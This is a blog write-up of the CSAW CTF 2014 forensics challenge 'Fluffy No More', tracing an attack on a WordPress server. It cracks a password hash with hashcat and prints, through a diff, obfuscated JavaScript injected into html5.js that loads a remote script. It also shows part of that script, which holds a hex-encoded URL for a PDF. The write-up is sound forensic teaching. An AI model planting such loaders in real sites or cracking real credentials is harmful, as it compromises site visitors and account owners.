csaw-ctf-2014-forensics-300-fluffy-no-more.html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>CSAW CTF 2014 - Forensics 300: "Fluffy No More"</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="Marina von Steinkirch">

    <!-- Le styles -->
    <link rel="stylesheet" href="./theme/css/bootstrap.dark.css" type="text/css" />
    <style type="text/css">
      body {
        padding-top: 60px;
        padding-bottom: 40px;
      }
      .tag-1 {
        font-size: 13pt;
      }
      .tag-2 {
        font-size: 11pt;
      }
      .tag-2 {
        font-size: 10pt;
      }
      .tag-4 {
        font-size: 8pt;
     }
    </style>
    <link href="./theme/css/bootstrap-responsive.dark.css" rel="stylesheet">
    <link href="./theme/css/font-awesome.css" rel="stylesheet">
    <link href="./theme/css/pygments.css" rel="stylesheet">


    <!-- Le fav and touch icons -->
    <link rel="shortcut icon" href="./theme/images/favicon.ico">
    <link rel="apple-touch-icon" href="./theme/images/apple-touch-icon.png">
    <link rel="apple-touch-icon" sizes="72x72" href="./theme/images/apple-touch-icon-72x72.png">
    <link rel="apple-touch-icon" sizes="114x114" href="./theme/images/apple-touch-icon-114x114.png">

    <link href="./feeds/all.atom.xml" type="application/atom+xml" rel="alternate" title="chmod +x singularity.sh ATOM Feed" />

  </head>

  <body>

    <div class="navbar navbar-fixed-top">
      <div class="navbar-inner">
        <div class="container-fluid">
          <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </a>
          <a class="brand" href="./index.html">chmod +x singularity.sh </a>
          <div class="nav-collapse">
            <ul class="nav">
                          <li class="divider-vertical"></li>

                          <ul class="nav pull-right">
                                <li><a href="./authors.html">About</a></li>
                                <li><a href="./archives.html"><b>Archives</b></a></li>
                                <li>
                                  <a href="https://github.com/bt3gl">github
                                  <!--<i class="icon-github-sign icon-large" ></i>-->
                                </a></li>
                                <li>
                                  <a href="https://twitter.com/1bt337">
                                  <!--<i class="icon-twitter-sign icon-large"></i> -->
                                  twitter
                                </a></li>
                                <li><a href="http://bt3gl.github.io/projects_page/index.html">Bygone Playful Times
                                </a></li>
                          </ul>

            </ul>
            <!--<p class="navbar-text pull-right">Logged in as <a href="#">username</a></p>-->
          </div><!--/.nav-collapse -->
        </div>
      </div>
    </div>

    <div class="container-fluid">
      <div class="row">
        <div class="span9" id="content">
<section id="content">
        <article>
                <header>
                        <h1>
                                <a href=""
                                        rel="bookmark"
                                        title="Permalink to CSAW CTF 2014 - Forensics 300: "Fluffy No More"">
                                        CSAW CTF 2014 - Forensics 300: "Fluffy No More"
                                </a>
                        </h1>
                </header>
                <div class="entry-content">
                <div class="well">
<footer class="post-info">
<abbr class="published" title="2014-09-28T11:21:00">
      Sun 28 September 2014 </abbr>

<span class="label"> Category</span>
<a href="./category/forensics.html"><i class="icon-folder-open"></i>Forensics</a>


<span class="label">Tags</span>
	<a href="./tag/ctf.html"><i class="icon-tag"></i>CTF</a>
	<a href="./tag/csaw.html"><i class="icon-tag"></i>CSAW</a>
	<a href="./tag/hashcat.html"><i class="icon-tag"></i>hashcat</a>
	<a href="./tag/pdf-parser.html"><i class="icon-tag"></i>pdf-parser</a>
	<a href="./tag/qpdf.html"><i class="icon-tag"></i>qpdf</a>
	<a href="./tag/lamp.html"><i class="icon-tag"></i>LAMP</a>
	<a href="./tag/javascript.html"><i class="icon-tag"></i>JavaScript</a>
</footer><!-- /.post-info -->                </div>
                <p>This is the fourth and the last of the forensics challenge in the CSAW CTF 2014 competition. It was much harder than the three before, but it was also much more interesting.</p>
<p>The challenge starts with the following text:</p>
<blockquote>
<p>OH NO WE'VE BEEN HACKED!!!!!! -- said the Eye Heart Fluffy Bunnies Blog owner.
Life was grand for the fluff fanatic until one day the site's users started to get attacked! Apparently fluffy bunnies are not just a love of fun furry families but also furtive foreign governments. The notorious "Forgotten Freaks" hacking group was known to be targeting high powered politicians. Were the cute bunnies the next in their long list of conquests!??</p>
<p>Well... The fluff needs your stuff. I've pulled the logs from the server for you along with a backup of it's database and configuration. Figure out what is going on!</p>
<p>Written by brad_anton</p>
<p><a href="https://ctf.isis.poly.edu/static/uploads/649bdf6804782af35cb9086512ca5e0d/CSAW2014-FluffyNoMore-v0.1.tar.bz2">CSAW2014-FluffyNoMore-v0.1.tar.bz2</a></p>
</blockquote>
<p>Oh, no! Nobody should mess with fluffy bunnies! Ever! Let's find how this attack happened!</p>
<h2>Inspecting the Directories</h2>
<p>We start by checking the identity of the file with the command <a href="http://en.wikipedia.org/wiki/File_(command)">file</a>. We do this to make sure that the extension is not misleading:</p>
<div class="highlight"><pre><span class="nv">$ </span>file CSAW2014-FluffyNoMore-v0.1.tar.bz2
CSAW2014-FluffyNoMore-v0.1.tar.bz2: bzip2 compressed data, block <span class="nv">size</span> <span class="o">=</span> 900k
</pre></div>


<p>OK, cool, we can go ahead and unzip the <em>bzip2</em> (compressed) tarball:</p>
<div class="highlight"><pre><span class="nv">$ </span>tar --help | grep bz
  -j, --bzip2                filter the archive through bzip2
<span class="nv">$ </span>tar -xjf CSAW2014-FluffyNoMore-v0.1.tar.bz2
</pre></div>


<p>Now let's take a look inside the folder:</p>
<div class="highlight"><pre><span class="nv">$ </span>tree CSAW2014-FluffyNoMore-v0.1
CSAW2014-FluffyNoMore-v0.1
├── etc_directory.tar.bz2
├── logs.tar.bz2
├── mysql_backup.sql.bz2
└── webroot.tar.bz2

0 directories, 4 files
</pre></div>


<p>All right, 4 more tarballs. Unziping and organizing them give us the following directories:</p>
<div class="highlight"><pre><span class="o">-</span> <span class="n">etc</span><span class="o">/</span>
<span class="o">-</span> <span class="n">var</span><span class="o">/</span><span class="n">log</span> <span class="n">and</span> <span class="n">var</span><span class="o">/</span><span class="n">www</span>
<span class="o">-</span> <span class="n">mysql_backup</span><span class="p">.</span><span class="n">sql</span> <span class="p">([</span><span class="n">MySQL</span> <span class="n">database</span> <span class="n">dump</span> <span class="n">file</span><span class="p">])</span>
</pre></div>


<p>This is the directory structure of a  <a href="https://coderwall.com/p/syyk0g?i=5&amp;p=1&amp;q=author%3Abt3gl&amp;t%5B%5D=bt3gl">LAMP server</a>, where LAMP stands for Linux-Apache-MySQL-PHP in the <a href="http://www.tldp.org/LDP/intro-linux/html/sect_03_01.html">Linux File System</a>. In this framework, the PHP/HTML/JavaScript webpage is placed inside <code>var/www</code>.</p>
<p>The directory <code>var/</code> contains files that are expected to change in size and content as the system is running (var stands for variable). So it is natural that system log files are generally placed at <code>/var/log</code>.</p>
<p>Finally, the <code>etc/</code> directory contains the system configuration files. For example, the file <code>resolv.conf</code> tells the system where to go on the network to obtain host name to IP address mappings (DNS). Another example is the file  <code>passwd</code>, which stores login information.</p>
<hr />
<h2>Before Anything else...</h2>
<p>OK, based on the previous challenges, we need to give a try:</p>
<div class="highlight"><pre><span class="nv">$ </span>grep -r -l <span class="s2">&quot;key{&quot;</span>
var/www/html/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery-ui.min.css
webroot.tar.bz2-extracted/var/www/html/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery-ui.min.css

<span class="nv">$ </span>grep -r -l <span class="s2">&quot;flag{&quot;</span>
var/www/html/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery-ui.min.css
webroot.tar.bz2-extracted/var/www/html/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery-ui.min.css
</pre></div>


<p>Is our life this easy??? No, of course not. The hits we got are just funny names to mislead us, for example:</p>
<div class="highlight"><pre> -96px}.ui-icon-home{background-position:0 -112px}.ui-icon-flag{background-position:-16px
</pre></div>


<hr />
<h2>Analyzing the MySQL Dump File</h2>
<p>Let's start taking a look at <code>mysql_backup.sql</code>.</p>
<p>Of course, no luck for:</p>
<div class="highlight"><pre><span class="nv">$ </span>cat mysql_backup.sql | grep <span class="s1">&#39;flag{&#39;</span>
</pre></div>


<p>Fine. We open <code>mysql_backup.sql</code> in a text editor. The comments table shows that someone named "hacker" made an appearance:</p>
<div class="highlight"><pre><span class="c1">-- MySQL dump 10.13  Distrib 5.5.38, for debian-linux-gnu (i686)</span>
<span class="c1">--</span>
<span class="c1">-- Host: localhost    Database: wordpress</span>
<span class="c1">-- ------------------------------------------------------</span>

<span class="c1">-- Dumping data for table `wp_comments`</span>
<span class="c1">--</span>
<span class="c1">(..)</span>

<span class="p">(</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="s1">&#39;Hacker&#39;</span><span class="p">,</span><span class="s1">&#39;hacker@secretspace.com&#39;</span><span class="p">,</span><span class="s1">&#39;&#39;</span><span class="p">,</span><span class="s1">&#39;192.168.127.130&#39;</span><span class="p">,</span><span class="s1">&#39;2014-09-16 14:21:26&#39;</span><span class="p">,</span><span class="s1">&#39;2014-09-16 14:21:26&#39;</span><span class="p">,</span><span class="s1">&#39;I HATE BUNNIES AND IM GOING TO HACK THIS SITE BWHAHAHAHAHAHAHAHAHAHAHAH!!!!!!! BUNNIES SUX&#39;</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="s1">&#39;1&#39;</span><span class="p">,</span><span class="s1">&#39;Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0&#39;</span><span class="p">,</span><span class="s1">&#39;&#39;</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span>

<span class="p">(</span><span class="mi">7</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="s1">&#39;Bald Bunny&#39;</span><span class="p">,</span><span class="s1">&#39;nohair@hairlessclub.com&#39;</span><span class="p">,</span><span class="s1">&#39;&#39;</span><span class="p">,</span><span class="s1">&#39;192.168.127.130&#39;</span><span class="p">,</span><span class="s1">&#39;2014-09-16 20:47:18&#39;</span><span class="p">,</span><span class="s1">&#39;2014-09-16 20:47:18&#39;</span><span class="p">,</span><span class="s1">&#39;I find this blog EXTREMELY OFFENSIVE!&#39;</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="s1">&#39;1&#39;</span><span class="p">,</span><span class="s1">&#39;Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0&#39;</span><span class="p">,</span><span class="s1">&#39;&#39;</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span>

<span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="s1">&#39;MASTER OF DISASTER&#39;</span><span class="p">,</span><span class="s1">&#39;shh@nottellin.com&#39;</span><span class="p">,</span><span class="s1">&#39;&#39;</span><span class="p">,</span><span class="s1">&#39;192.168.127.137&#39;</span><span class="p">,</span><span class="s1">&#39;2014-09-17 19:40:57&#39;</span><span class="p">,</span><span class="s1">&#39;2014-09-17 19:40:57&#39;</span><span class="p">,</span><span class="s1">&#39;Shut up baldy&#39;</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="s1">&#39;1&#39;</span><span class="p">,</span><span class="s1">&#39;Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko&#39;</span><span class="p">,</span><span class="s1">&#39;&#39;</span><span class="p">,</span><span class="mi">7</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span>
<span class="p">(...)</span>
</pre></div>


<p>Searching for the host <strong>secretspace.com</strong> leads to some generic website. Inspecting its source code does not give us any hint either. Maybe its IP address?</p>
<div class="highlight"><pre><span class="nv">$ </span>dig secretspace.com

; &lt;&lt;&gt;&gt; DiG 9.9.4-P2-RedHat-9.9.4-15.P2.fc20 &lt;&lt;&gt;&gt; secretspace.com
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER<span class="s">&lt;&lt;- opco</span>de: QUERY, status: NOERROR, id: 61131
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;secretspace.com.       IN  A

;; ANSWER SECTION:
secretspace.com.    285 IN  A   72.167.232.29

;; Query <span class="nb">time</span>: 7 msec
;; SERVER: 10.0.0.1#53<span class="o">(</span>10.0.0.1<span class="o">)</span>
;; WHEN: Thu Sep 25 15:51:26 EDT 2014
;; MSG SIZE  rcvd: 49
</pre></div>


<p>The IP 72.167.232.29  leads to another generic page with no hints and with nothing in special in the source code. Wrong direction...</p>
<p>All right, let's give a last try and open the tables from the MySQL dump file inside a nice GUI. I use <a href="http://www.phpmyadmin.net/home_page/index.php">phpMyAdmin</a>, which I showed how to install and to configure in my tutorial about setting up a <a href="https://coderwall.com/p/syyk0g?i=5&amp;p=1&amp;q=author%3Abt3gl&amp;t%5B%5D=bt3gl">LAMP server</a>.</p>
<p>We open <code>localhost/phpmyadmin</code> in our browser. First we go  to <em>Databases</em> and then <em>Create Database</em> with any name we want. Then we  <em>Import</em> <code>`mysql_backup.sql</code> to this database. All the tables are loaded. Let's use the <em>Search</em> option to look for <em>key</em> or <em>flag</em>.</p>
<p><img alt="" src="http://i.imgur.com/tVOY1VJ.png" />
<img alt="" src="http://i.imgur.com/jY7CbLZ.png" /></p>
<p>Nope. Nothing in special. By the way, <code>`default_pingback_flag1</code> is just a <strong>Wordpress</strong> flag indicating the default status of ping backs when new blog posts are published.</p>
<p>Let's continue our search. If we look  inside each of the tables we find:</p>
<ul>
<li>
<p>The URL for the <a href="http://ww17.blog.eyeheartfluffybunnies.com">blog</a>, which doesn't render. However, in the source code there is a commented link that leads to a <a href="http://ww17.blog.eyeheartfluffybunnies.com/?fp=Tnxj5vWdcChO2G66EhCHHqSAdskqgQmZEbVQIh1DCmrgCyQjbeNsPhkvCpIUcP19mwOmcCS1hIeFb9Aj3%2FP4fw%3D%3D&amp;prvtof=RyfmkPY5YuWnUulUghSjPRX510XSb9C0HJ2xsUn%2Fd3Q%3D&amp;poru=jcHIwHNMXYtWvhsucEK%2BtSMzUepfq46Tam%2BwGZBSFMjZiV2p3eqdw8zpPiLr76ixCoirz%2FR955vowRxEMBO%2FoQ%3D%3D&amp;cifr=1&amp;%22">cute website</a>. Nothing else.</p>
</li>
<li>
<p>Oh, wait! We found a hashed password!
<img alt="" src="http://i.imgur.com/FiQONze.png" /></p>
</li>
</ul>
<hr />
<h2>Cracking the Password</h2>
<p>We want to crack <code>$P$BmHbpWPZrjt.2V8T2xDJfbDrAJZ9So1</code> and for this we are going to use <a href="http://hashcat.net/hashcat/">hashcat</a>. If you are in <a href="http://www.kali.org/">Kali</a> or in any Debian distribution you can install it with:</p>
<div class="highlight"><pre><span class="nv">$ </span>apt-get hashcat
</pre></div>


<p>In Fedora, we need to download and unzip it:</p>
<div class="highlight"><pre><span class="nv">$ </span>wget http://hashcat.net/files/hashcat-0.47.7z
<span class="nv">$ </span>7za e hashcat-0.47.7z
</pre></div>


<p>Now, we are going to perform a brute force attack so we need a list of passwords. If you are using Kali, you can find them with:</p>
<div class="highlight"><pre><span class="nv">$ </span>locate wordlist
</pre></div>


<p>If not, this is an example for you (it's always good to have several lists!):</p>
<div class="highlight"><pre><span class="nv">$ </span>wget http://www.scovetta.com/download/500_passwords.txt
<span class="nv">$ </span>head 500_passwords.txt
123456
password
12345678
1234
12345
dragon
qwerty
696969
mustang
</pre></div>


<p>Hashcat is awesome because it gives you a list of hash types:</p>
<div class="highlight"><pre>    <span class="mi">0</span> <span class="o">=</span> <span class="n">MD5</span>
   <span class="mi">10</span> <span class="o">=</span> <span class="n">md5</span><span class="p">(</span><span class="err">$</span><span class="n">pass</span><span class="p">.</span><span class="err">$</span><span class="n">salt</span><span class="p">)</span>
   <span class="mi">20</span> <span class="o">=</span> <span class="n">md5</span><span class="p">(</span><span class="err">$</span><span class="n">salt</span><span class="p">.</span><span class="err">$</span><span class="n">pass</span><span class="p">)</span>
   <span class="mi">30</span> <span class="o">=</span> <span class="n">md5</span><span class="p">(</span><span class="n">unicode</span><span class="p">(</span><span class="err">$</span><span class="n">pass</span><span class="p">).</span><span class="err">$</span><span class="n">salt</span><span class="p">)</span>
   <span class="mi">40</span> <span class="o">=</span> <span class="n">md5</span><span class="p">(</span><span class="n">unicode</span><span class="p">(</span><span class="err">$</span><span class="n">pass</span><span class="p">).</span><span class="err">$</span><span class="n">salt</span><span class="p">)</span>
   <span class="mi">50</span> <span class="o">=</span> <span class="n">HMAC</span><span class="o">-</span><span class="n">MD5</span> <span class="p">(</span><span class="n">key</span> <span class="o">=</span> <span class="err">$</span><span class="n">pass</span><span class="p">)</span>
   <span class="mi">60</span> <span class="o">=</span> <span class="n">HMAC</span><span class="o">-</span><span class="n">MD5</span> <span class="p">(</span><span class="n">key</span> <span class="o">=</span> <span class="err">$</span><span class="n">salt</span><span class="p">)</span>
  <span class="mi">100</span> <span class="o">=</span> <span class="n">SHA1</span>
  <span class="mi">110</span> <span class="o">=</span> <span class="n">sha1</span><span class="p">(</span><span class="err">$</span><span class="n">pass</span><span class="p">.</span><span class="err">$</span><span class="n">salt</span><span class="p">)</span>
  <span class="mi">120</span> <span class="o">=</span> <span class="n">sha1</span><span class="p">(</span><span class="err">$</span><span class="n">salt</span><span class="p">.</span><span class="err">$</span><span class="n">pass</span><span class="p">)</span>
  <span class="mi">130</span> <span class="o">=</span> <span class="n">sha1</span><span class="p">(</span><span class="n">unicode</span><span class="p">(</span><span class="err">$</span><span class="n">pass</span><span class="p">).</span><span class="err">$</span><span class="n">salt</span><span class="p">)</span>
  <span class="mi">140</span> <span class="o">=</span> <span class="n">sha1</span><span class="p">(</span><span class="err">$</span><span class="n">salt</span><span class="p">.</span><span class="n">unicode</span><span class="p">(</span><span class="err">$</span><span class="n">pass</span><span class="p">))</span>
  <span class="mi">150</span> <span class="o">=</span> <span class="n">HMAC</span><span class="o">-</span><span class="n">SHA1</span> <span class="p">(</span><span class="n">key</span> <span class="o">=</span> <span class="err">$</span><span class="n">pass</span><span class="p">)</span>
  <span class="mi">160</span> <span class="o">=</span> <span class="n">HMAC</span><span class="o">-</span><span class="n">SHA1</span> <span class="p">(</span><span class="n">key</span> <span class="o">=</span> <span class="err">$</span><span class="n">salt</span><span class="p">)</span>
  <span class="mi">200</span> <span class="o">=</span> <span class="n">MySQL</span>
  <span class="mi">300</span> <span class="o">=</span> <span class="n">MySQL4</span><span class="mf">.1</span><span class="o">/</span><span class="n">MySQL5</span>
  <span class="mi">400</span> <span class="o">=</span> <span class="n">phpass</span><span class="p">,</span> <span class="n">MD5</span><span class="p">(</span><span class="n">Wordpress</span><span class="p">),</span> <span class="n">MD5</span><span class="p">(</span><span class="n">phpBB3</span><span class="p">)</span>
  <span class="mi">500</span> <span class="o">=</span> <span class="n">md5crypt</span><span class="p">,</span> <span class="n">MD5</span><span class="p">(</span><span class="n">Unix</span><span class="p">),</span> <span class="n">FreeBSD</span> <span class="n">MD5</span><span class="p">,</span> <span class="n">Cisco</span><span class="o">-</span><span class="n">IOS</span> <span class="n">MD5</span>
  <span class="mi">800</span> <span class="o">=</span> <span class="n">SHA</span><span class="o">-</span><span class="mi">1</span><span class="p">(</span><span class="n">Django</span><span class="p">)</span>
  <span class="p">(...)</span>
</pre></div>


<p>We choose 400 because we are dealing with Wordpress. We copy and paste the hash to a file <em>pass.hash</em>. Then, we run:</p>
<div class="highlight"><pre><span class="nv">$ </span>./hashcat-cli64.bin -m 400 -a 0 -o cracked.txt --remove  pass.hash word_list.txt

Initializing hashcat v0.47 by atom with 8 threads and 32mb segment-size...
<span class="o">(</span>...<span class="o">)</span>
</pre></div>


<p>where:</p>
<ul>
<li>-m is for --hash-type=NUM</li>
<li>-a 0: Using a dictionary attack</li>
<li>cracked.txt is the output file</li>
<li>word_list.txt is our dictionary</li>
</ul>
<p>Now let's take a peak in the output file:</p>
<div class="highlight"><pre><span class="nv">$ </span>cat cracked.txt
<span class="nv">$P$BmHbpWPZrjt</span>.2V8T2xDJfbDrAJZ9So1:fluffybunnies
</pre></div>


<p>It worked! Our password is <strong>fluffybunnies</strong>!</p>
<p>All right, this is a very silly password! It could be easily guessed. If you were the attacker, wouldn't you try this as the first option? OK, maybe right after <em>password</em> and <em>123456</em>... :)</p>
<h4>What we have so far</h4>
<p>All we have learned from the MySQL dump file was:</p>
<ul>
<li>
<p>the attacker's motivation,</p>
</li>
<li>
<p>the blog's URL,</p>
</li>
<li>
<p>that the application was in Wordpress,</p>
</li>
<li>
<p>and a password.</p>
</li>
</ul>
<p>Ah,  also that <code>mailserver_login:login@example.com</code> and <code>mailserver_pass=password</code>. Talking about security...</p>
<p>Let's move on.</p>
<hr />
<h2>Inspecting /var/logs/apache2</h2>
<p>The next item in the list is log inspection. We need wisely choose where to start because there are many of them:</p>
<div class="highlight"><pre><span class="nv">$ </span>find . -type f  -name <span class="s1">&#39;*.log&#39;</span>
./apache2/error.log
./apache2/access.log
./apache2/other_vhosts_access.log
./fontconfig.log
./boot.log
./gpu-manager.log
./mysql.log
./bootstrap.log
./pm-powersave.log
./kern.log
./mysql/error.log
./alternatives.log
./lightdm/x-0.log
./lightdm/lightdm.log
./casper.log
./auth.log
./apt/term.log
./apt/history.log
./dpkg.log
./Xorg.0.log
./upstart/container-detect.log
./upstart/console-setup.log
./upstart/mysql.log
./upstart/alsa-state.log
./upstart/network-manager.log
./upstart/whoopsie.log
./upstart/procps-virtual-filesystems.log
./upstart/cryptdisks.log
./upstart/systemd-logind.log
./upstart/procps-static-network-up.log
./upstart/alsa-restore.log
./upstart/modemmanager.log
</pre></div>


<p>We start with the Apache's log, because they carry the connection information. If there is any important information in the log files, it should appears in the end, because the attack should be one of the last things that were logged.</p>
<p>It turned out that <a href="http://en.wikipedia.org/wiki/Tail_(Unix)">Tailing</a> the <em>apache</em> logs did not reveal anything useful.</p>
<hr />
<h2>Inspecting var/logs/auth.log</h2>
<p>Considering that the password <strong>fluffybunnies</strong> was very easy to guess, we are going to take a leap and suppose that this was how the attack was crafted.</p>
<p>Tailing <code>auth.log</code> shows something interesting:</p>
<div class="highlight"><pre>Sep 17 19:18:53 ubuntu sudo:   ubuntu : <span class="nv">TTY</span><span class="o">=</span>pts/0 ; <span class="nv">PWD</span><span class="o">=</span>/home/ubuntu/CSAW2014-WordPress/var/www ; <span class="nv">USER</span><span class="o">=</span>root ; <span class="nv">COMMAND</span><span class="o">=</span>/bin/chmod -R 775 /var/www/
Sep 17 19:20:09 ubuntu sudo:   ubuntu : <span class="nv">TTY</span><span class="o">=</span>pts/0 ; <span class="nv">PWD</span><span class="o">=</span>/home/ubuntu/CSAW2014-WordPress/var/www ; <span class="nv">USER</span><span class="o">=</span>root ; <span class="nv">COMMAND</span><span class="o">=</span>/usr/bin/vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js
Sep 17 19:20:55 ubuntu sudo:   ubuntu : <span class="nv">TTY</span><span class="o">=</span>pts/0 ; <span class="nv">PWD</span><span class="o">=</span>/home/ubuntu/CSAW2014-WordPress/var/www ; <span class="nv">USER</span><span class="o">=</span>root ; <span class="nv">COMMAND</span><span class="o">=</span>/usr/bin/find /var/www/html/ * touch <span class="o">{}</span>
</pre></div>


<p>So someone logged as root:</p>
<ol>
<li>
<p>downgraded the permissions of <em>/var/www</em> (755 means read and execute access for everyone and also write access for the owner of the file), and</p>
</li>
<li>
<p>modified a JavaScript file (html5.js) in <em>vi</em>.</p>
</li>
</ol>
<hr />
<h2>Finding the JavaScript Exploit</h2>
<p>It looks like an attack to me! Let's <a href="http://linux.die.net/man/1/diff">diff</a> this JavaScript file with the original (<a href="http://phpxref.ftwr.co.uk/wordpress/wp-content/themes/twentythirteen/js/html5.js.source.html">which we can just google</a>):</p>
<div class="highlight"><pre><span class="nv">$ </span>diff html5.js html5_normal.js
93,122d92
&lt; var <span class="nv">g</span> <span class="o">=</span> <span class="s2">&quot;ti&quot;</span>;
&lt; var <span class="nv">c</span> <span class="o">=</span> <span class="s2">&quot;HTML Tags&quot;</span>;
&lt; var <span class="nv">f</span> <span class="o">=</span> <span class="s2">&quot;. li colgroup br src datalist script option .&quot;</span>;
&lt; <span class="nv">f</span> <span class="o">=</span> f.split<span class="o">(</span><span class="s2">&quot; &quot;</span><span class="o">)</span>;
&lt; <span class="nv">c</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span>;
&lt; <span class="nv">k</span> <span class="o">=</span> <span class="s2">&quot;/&quot;</span>;
&lt; <span class="nv">m</span> <span class="o">=</span> f<span class="o">[</span>6<span class="o">]</span>;
&lt; <span class="k">for</span> <span class="o">(</span>var <span class="nv">i</span> <span class="o">=</span> 0; i &lt; f.length; i++<span class="o">)</span> <span class="o">{</span>
&lt;     c +<span class="o">=</span> f<span class="o">[</span>i<span class="o">]</span>.length.toString<span class="o">()</span>;
&lt; <span class="o">}</span>
&lt; <span class="nv">v</span> <span class="o">=</span> f<span class="o">[</span>0<span class="o">]</span>;
&lt; <span class="nv">x</span> <span class="o">=</span> <span class="s2">&quot;\&#39;ht&quot;</span>;
&lt; <span class="nv">b</span> <span class="o">=</span> f<span class="o">[</span>4<span class="o">]</span>;
&lt; <span class="nv">f</span> <span class="o">=</span> 2541 * 6 - 35 + 46 + 12 - 15269;
&lt; c +<span class="o">=</span> f.toString<span class="o">()</span>;
&lt; <span class="nv">f</span> <span class="o">=</span> <span class="o">(</span>56 + 31 + 68 * 65 + 41 - 548<span class="o">)</span> / 4000 - 1;
&lt; c +<span class="o">=</span> f.toString<span class="o">()</span>;
&lt; <span class="nv">f</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span>;
&lt; <span class="nv">c</span> <span class="o">=</span> c.split<span class="o">(</span><span class="s2">&quot;&quot;</span><span class="o">)</span>;
&lt; var <span class="nv">w</span> <span class="o">=</span> 0;
&lt; <span class="nv">u</span> <span class="o">=</span> <span class="s2">&quot;s&quot;</span>;
&lt; <span class="k">for</span> <span class="o">(</span>var <span class="nv">i</span> <span class="o">=</span> 0; i &lt; c.length; i++<span class="o">)</span> <span class="o">{</span>
&lt;     <span class="k">if</span> <span class="o">(((</span><span class="nv">i</span> <span class="o">==</span> 3 <span class="o">||</span> <span class="nv">i</span> <span class="o">==</span> 6<span class="o">)</span> <span class="o">&amp;&amp;</span> w !<span class="o">=</span> 2<span class="o">)</span> <span class="o">||</span> <span class="o">((</span><span class="nv">i</span> <span class="o">==</span> 8<span class="o">)</span> <span class="o">&amp;&amp;</span> <span class="nv">w</span> <span class="o">==</span> 2<span class="o">))</span> <span class="o">{</span>
&lt;         f +<span class="o">=</span> String.fromCharCode<span class="o">(</span>46<span class="o">)</span>;
&lt;         w++;
&lt;     <span class="o">}</span>
&lt;     f +<span class="o">=</span> c<span class="o">[</span>i<span class="o">]</span>;
&lt; <span class="o">}</span>
&lt; <span class="nv">i</span> <span class="o">=</span> k + <span class="s2">&quot;anal&quot;</span>;
&lt; document.write<span class="o">(</span><span class="s2">&quot;&lt;&quot;</span> + m + <span class="s2">&quot; &quot;</span> + b + <span class="s2">&quot;=&quot;</span> + x + <span class="s2">&quot;tp:&quot;</span> + k + k + f + i + <span class="s2">&quot;y&quot;</span> + g + <span class="s2">&quot;c&quot;</span> + u + v + <span class="s2">&quot;j&quot;</span> + u + <span class="s2">&quot;\&#39;&gt;\&lt;/&quot;</span> + m + <span class="s2">&quot;\&gt;&quot;</span><span class="o">)</span>;
</pre></div>


<p>Aha!!! So what is being written?</p>
<p>In JavaScript, the function <code>document.write()</code> writes HTML expressions or JavaScript code to a document. However, we can debug it in the console if we want, changing it to <code>console.log()</code> (and changing any <code>document</code> word to <code>console</code>).</p>
<p>To run JavaScript in the console, you need to install <a href="http://nodejs.org/">Node</a>.</p>
<p>So we run and we get a URL:</p>
<div class="highlight"><pre><span class="nv">$ </span>node html5.js
&lt;script <span class="nv">src</span><span class="o">=</span><span class="s1">&#39;http://128.238.66.100/analytics.js&#39;</span>&gt;&lt;/script&gt;
</pre></div>


<hr />
<h2>Analyzing the Second JavaScript Exploit</h2>
<p>Awesome, we see a script exploit! Let's get it!</p>
<div class="highlight"><pre><span class="nv">$ </span> wget http://128.238.66.100/analytics.js
--2014-09-25 19:17:19--  http://128.238.66.100/analytics.js
Connecting to 128.238.66.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16072 <span class="o">(</span>16K<span class="o">)</span> <span class="o">[</span>application/javascript<span class="o">]</span>
Saving to: ‘analytics.js’

100%<span class="o">[===============================================================================</span>&gt;<span class="o">]</span> 16,072      --.-K/s   in 0.008s

2014-09-25 19:17:19 <span class="o">(</span>2.02 MB/s<span class="o">)</span> - ‘analytics.js’ saved <span class="o">[</span>16072/16072<span class="o">]</span>
</pre></div>


<p>The file turns out to be large, and <em>grep</em> <em>flag</em> or <em>key</em> doesn't show any hit. No IP addresses or URL neither.</p>
<p>OK, let's take a closer look. We open the file in a text editor and we find a weird hex-encoded variable that is completely unconnected from the rest:</p>
<div class="highlight"><pre><span class="n">var</span> <span class="n">_0x91fe</span> <span class="o">=</span> <span class="p">[</span><span class="s">&quot;</span><span class="se">\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66</span><span class="s">&quot;</span><span class="p">,</span> <span class="s">&quot;</span><span class="se">\x5F\x73\x65\x6C\x66</span><span class="s">&quot;</span><span class="p">,</span> <span class="s">&quot;</span><span class="se">\x6F\x70\x65\x6E</span><span class="s">&quot;</span><span class="p">];</span>
